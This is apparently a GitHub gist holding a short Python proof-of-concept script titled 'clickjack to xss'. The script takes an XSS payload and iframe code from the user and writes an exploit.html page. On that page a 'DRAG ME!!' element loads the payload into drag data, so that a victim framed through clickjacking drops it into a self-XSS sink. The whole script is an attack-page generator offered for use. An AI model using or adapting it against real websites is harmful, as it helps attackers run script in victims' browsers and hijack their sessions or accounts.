-
-
Save Expertasif/702ffbe607c1f5202f8cf1da73f21005 to your computer and use it in GitHub Desktop.
clickjack to xss poc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| print "Clickjack to Xss" | |
| vector=raw_input('xss vector--> ') #xss payload | |
| html=raw_input('Custom Iframe Code--> ') #custom iframe code | |
| fo=open('exploit.html','w') #creating html file | |
| source_code="""<html><body> | |
| <h1>Clickjack to exploit self xss </h1> | |
| <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div> | |
| """%(vector) | |
| fo.write(source_code) | |
| fo=open('exploit.html','a') | |
| fo.write(html) | |
| fo.write('</body></html>') | |
| fo.close() #closing the file | |
| print "file created" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment